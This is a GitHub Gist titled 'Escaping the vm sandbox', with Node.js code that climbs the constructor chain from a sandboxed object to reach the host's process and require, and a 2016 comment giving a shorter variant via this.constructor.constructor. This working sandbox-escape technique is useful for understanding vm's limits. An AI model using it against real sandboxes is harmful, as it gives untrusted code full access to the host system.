Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
`, sandbox);

This comment has been minimized.

Copy link

@NiXXeD NiXXeD commented May 13, 2016

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.